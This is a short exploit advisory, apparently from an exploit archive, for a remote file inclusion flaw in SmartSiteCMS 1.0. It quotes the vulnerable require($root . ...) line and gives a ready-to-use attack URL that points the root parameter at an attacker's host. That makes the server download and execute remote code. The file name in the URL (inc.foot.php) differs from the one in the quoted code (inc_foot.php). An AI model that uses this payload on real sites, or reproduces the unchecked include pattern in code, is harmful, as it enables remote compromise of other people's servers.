id: 535
date: 06/19/2006
title: SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability
author: Archit3ct
cves: 

===========================================================
SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability
===========================================================



# smartsite cms <= 1.0 Remote File Inclusion
#
# Contact : irc.gigachat.net #ir4dex
# Risk : High
# Class : Remote
# Script : smartsite cms
# Version : not specified
# URL: http://www.smartsitecms.net/
---------------------------------------------------------------------

Vulnerable code :

require($root . "include/inc_foot.php");

---------------------------------------------------------------------

http://www.site.com/[smartsitecmspath]/include/inc.foot.php?root=http://[attacker]

by Archit3ct and IR4DEX GROUP

Greetz: Darkfire



#  0day.today [2023-03-24]  #